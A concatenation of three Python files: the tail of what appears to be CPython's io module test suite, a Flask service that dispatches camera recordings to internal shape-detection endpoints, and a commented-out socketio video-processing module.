r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.read)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
#shutdown_error = "LookupError: unknown encoding: ascii"
shutdown_error = "TypeError: 'NoneType' object is not iterable"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertTrue(obj is not None, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertTrue(wr() is None, wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with warnings.catch_warnings(record=True) as recorded:
open(r, *args, closefd=False, **kwargs)
support.gc_collect()
self.assertEqual(recorded, [])
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
def _set_non_blocking(self, fd):
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
self.assertNotEqual(flags, -1)
res = fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
self.assertEqual(res, 0)
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
self._set_non_blocking(r)
self._set_non_blocking(w)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertTrue(sent == received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError,
wio.write, item * (support.PIPE_MAX_SIZE // len(item) + 1))
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
def _read():
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
self.assertEqual(N, wio.write(item * N))
wio.flush()
write_finished = True
t.join()
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
main.py
|
import os
import logging
import copy
import time
import threading
import json
from os import listdir
from os.path import isfile, join
import requests
from flask import Flask, jsonify
from flask_restful import Resource, Api, reqparse
import influxdb
# setup logging
try:
log_level = os.environ['LOG_LEVEL']
except:
log_level = "DEBUG"
FORMAT = '%(levelname)s %(message)s'
logging.basicConfig(format=FORMAT, level=getattr(logging, log_level))
log = logging.getLogger()
app = Flask(__name__)
api = Api(app)
shape_request_list_jpg = []
shape_request_list_mp4 = []
deep_analytics_list = []
lock = threading.Lock()
def get_desired_shapes(profile):
'''
Lookup the shapes configured into the database eligible for hits
'''
shape_set = set()
confidence_level = 0.7
min_skip_frame = 5
max_skip_frame = 5
if not profile:
log.info("no analytics profile set")
return shape_set
url_profile = "http://"+cia+":8000/rest/analytics_profiles/"+profile
url_shape = "http://"+cia+":8000/rest/analytics_shapes"
shape_list_db = []
try:
r = requests.get(url_profile)
if r.status_code == 200:
shape_list_db = r.json()['shapes']
confidence_level = r.json()['confidence_level'] / 100
min_skip_frame = r.json()['min_nbr_video_frames_skipped']
max_skip_frame = r.json()['max_nbr_video_frames_skipped']
except Exception as e:
log.error(str(e))
try:
r = requests.get(url_shape)
if r.status_code == 200:
for rec in r.json():
if rec['id'] in shape_list_db:
shape_set.add(rec['shape'])
except Exception as e:
log.error(str(e))
return min_skip_frame, max_skip_frame, shape_set, confidence_level
def handle_deep_analytics():
while(1):
time.sleep(0.5)
recording_id = None
lock.acquire()
if len(deep_analytics_list) > 0:
recording_id = deep_analytics_list.pop(0)
lock.release()
if recording_id:
log.info("start_get_deep_data {}".format(recording_id))
data = {}
data['recording_id'] = str(recording_id)
try:
r = requests.post("http://"+cia+":5106/deep_analysis/api/v1.0/get_deep_data", json=data)
except Exception as e:
log.error(str(e))
if r.status_code != 201:
log.error("deep analytics error".format(r.status_code))
time.sleep(0.5)
def handle_shape_requests_mp4():
while(1):
shape_request = None
lock.acquire()
if len(shape_request_list_mp4) > 0:
# take the next analytics request from the queue
shape_request = shape_request_list_mp4.pop(0)
lock.release()
if shape_request:
log.debug("len_of_shape_request_list_mp4 {}".format(len(shape_request_list_mp4)))
min_skip_frames, max_skip_frames, desired_shapes, confidence_level = get_desired_shapes(shape_request['analytics_profile'])
analyse_each_n_frames = min_skip_frames
if len(shape_request_list_mp4) > 5:
analyse_each_n_frames = max_skip_frames
if len(desired_shapes) > 0:
try:
data = {
"file": '/root'+shape_request['file']
}
url = "http://"+cia+":5103/shape/api/v1.0/get_video_metadata"
r = requests.post(url, json=data, timeout=30)
if r.status_code == 201:
video_metadata = r.json()
filename, file_extension = os.path.splitext(shape_request['file'])
file_base = '/root'+filename
data = {
"camera_name": shape_request['camera_name'],
"file": '/root'+shape_request['file'],
"type": shape_request['type'],
"recording_id": shape_request['id'],
"file_base": file_base,
"desired_shapes": json.dumps(list(desired_shapes)),
"confidence_level": confidence_level,
"analyse_each_n_frames": analyse_each_n_frames
}
url = "http://"+cia+":5105/shape/api/v1.0/find_shape"
r = requests.post(url, json=data, timeout=1200)
if r.status_code == 201:
shape_list = r.json()
influxdb.send_analytics_shape_data_to_influx(
cia,
shape_request['camera_name'],
shape_request['epoch'],
shape_list, desired_shapes,
recording_id=shape_request['id'],
asset_type='video',
video_metadata = video_metadata)
for shape_entry in shape_list:
rec = {"camera_name": shape_request['camera_name']}
rec['shape_type'] = shape_entry['shape']
rec['snapshot_url'] = shape_entry['snapshot_url']
rec['time'] = 'tbd'
r = requests.post('http://'+cia+':5107/interworking/api/v1.0/register_detected_shape', json=rec)
if r.status_code != 201:
log.error("register_detected_shape error {}".format(r.status_code))
lock.acquire()
deep_analytics_list.append(shape_request['id'])
lock.release()
else:
log.error("find_shape error code {}".format(r.status_code))
else:
log.error("cannot get video metadata for {}".format(data['file']))
except Exception as e:
log.error("%s", str(e))
else:
log.info("No shapes to be analysed for mp4")
time.sleep(0.5)
class MotionDetected(Resource):
'''
REST API class for the reception of motion on a given camera
'''
def __init__(self):
self.reqparse = reqparse.RequestParser()
self.reqparse.add_argument('camera_name', type = str, required = True, location = 'json')
self.reqparse.add_argument('file', type = str, required = True, location = 'json')
self.reqparse.add_argument('type', type = str, required = True, location = 'json')
self.reqparse.add_argument('epoch', type = str, required = True, location = 'json')
self.reqparse.add_argument('analytics_profile', type = str, required = False, location = 'json')
super(MotionDetected, self).__init__()
def post(self):
'''
Receive motion trigger
'''
args = self.reqparse.parse_args()
log.debug("motion triggered %s", args)
# TBC Report motion detection to interworking
return {}, 201
class RecordingReady(Resource):
'''
REST API class for the reception of motion on a given camera
'''
def __init__(self):
self.reqparse = reqparse.RequestParser()
self.reqparse.add_argument('camera_name', type = str, required = True, location = 'json')
self.reqparse.add_argument('file', type = str, required = False, location = 'json')
self.reqparse.add_argument('type', type = str, required = True, location = 'json')
self.reqparse.add_argument('epoch', type = str, required = True, location = 'json')
self.reqparse.add_argument('analytics_profile', type = str, required = False, location = 'json')
self.reqparse.add_argument('id', type = str, required = False, location = 'json')
super(RecordingReady, self).__init__()
def post(self):
'''
Receive recording ready trigger
'''
args = self.reqparse.parse_args()
log.debug("Receive recording triggered %s", args)
lock.acquire()
shape_request_list_mp4.append(copy.deepcopy(args))
lock.release()
# quick motion check on single image of the motion clip
return {}, 201
# bind resource for REST API service
api.add_resource(MotionDetected, '/motion/api/v1.0/motion_detected', endpoint = 'motion_detected')
api.add_resource(RecordingReady, '/motion/api/v1.0/recording_ready', endpoint = 'recording_ready')
try:
cia = os.environ['CONCIERGE_IP_ADDRESS']
except:
cia = '127.0.0.1'
try:
root_dir = os.environ['ROOT_DIR']
except:
root_dir = ''
# offload triggers for shape detection to a seperate thread
shape_handler_mp4 = threading.Thread(target=handle_shape_requests_mp4, args=())
shape_handler_mp4.start()
deep_analytics = threading.Thread(target=handle_deep_analytics, args=())
deep_analytics.start()
app.run(host="0.0.0.0", port=5104)
|
sockets.py
|
# import logging
#
# from socketio.namespace import BaseNamespace
# from socketio.mixins import RoomsMixin, BroadcastMixin
# from socketio.sdjango import namespace
# import time
# from models import Dataset,Video
# from multiprocessing import Pool
# from threading import Thread
# from enums import Compute_state
# from video_processor.models import ShotsDetection,ECR,VideoShotsResult,VideoFrame
#
# def evaluate(self,shotDetection,video):
# for x in shotDetection:
# x.evaluate(video)
# self.broadcast_event('endEval')
#
# # Prepare videos
# def pre_vids(self,videos,dataset,update,overwrite,overwrite_audio,algos):
# nbstep = len(videos)
# nbdone = 0
# print(self)
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# for video in videos:
# video.prepare_state = Compute_state.IN_PROGRESS
# video.save()
# self.broadcast_event('refresh',{"id":video.id})
# dataset.prepare_video(video,update=update, overwrite_converted=overwrite, overwrite_audio=overwrite_audio)
# self.broadcast_event('refresh',{"id":video.id})
# nbdone+=1
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# self.broadcast_event('end')
#
# # Shot videos, evaluate and take thumbnails
# def shot_vids(self,videos,dataset,update,overwrite,overwrite_audio,algos):
# shots_detection = ShotsDetection()
# shots_detection.save()
# shots_detection.setAlgos(algos)
#
# nbstep = len(videos)
# nbdone = 0
# print(self)
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# for video in videos:
# video.shot_state = Compute_state.IN_PROGRESS
# video.save()
# self.broadcast_event('refresh',{"id":video.id})
#
# shots_detection.detect(video)
# nbdone+=1
#
# if(video.shot_boundaries_ground_truth != []):
# shots_detection.evaluate(video)
# shots_detection.take_thumbnails(video)
# self.broadcast_event('refresh',{"id":video.id})
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# self.broadcast_event('end')
#
# # Create the features
# def feature_vids(self,videos,dataset,update,overwrite,overwrite_audio,algos):
# nbstep = len(videos)
# nbdone = 0
# print(self)
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# for video in videos:
# video.features_state = Compute_state.IN_PROGRESS
# video.save()
# self.broadcast_event('refresh',{"id":video.id})
# dataset.compute_features(video,overwrite)
# self.broadcast_event('refresh',{"id":video.id})
# nbdone+=1
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# self.broadcast_event('end')
#
# # Create the arousal
# def arousal_vids(self,videos,dataset,update,overwrite,overwrite_audio,algos,window_len=1000,wsize=10,wstep=3,crest_intensity_threshold=0.1,beta=8):
# nbstep = len(videos)
# nbdone = 0
# # print(self)
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# for video in videos:
# video.arousal_state = Compute_state.IN_PROGRESS
# video.save()
# self.broadcast_event('refresh',{"id":video.id})
# dataset.model_arousal(video,overwrite,window_len,wsize,wstep,crest_intensity_threshold,beta)
# self.broadcast_event('refresh',{"id":video.id})
# nbdone+=1
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# self.broadcast_event('update arousal',{})
# self.broadcast_event('end')
#
# # Prepare, shot, features and arousal the video
# def all_vids(self,videos,dataset,update,overwrite,overwrite_audio,algos):
# # Prepare shot detection
# shots_detection = ShotsDetection()
# shots_detection.save()
# shots_detection.setAlgos(algos)
#
# dataset.prepare()
# nbvid = len(videos)
# nbstep = nbvid*4
# nbdone = 0
# print(self)
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# for video in videos:
# video.prepare_state = Compute_state.IN_PROGRESS
# video.save()
# self.broadcast_event('refresh',{"id":video.id})
#
# dataset.prepare_video(video,update=update, overwrite_converted=overwrite, overwrite_audio=overwrite_audio)
# self.broadcast_event('refresh',{"id":video.id})
# nbdone+=1
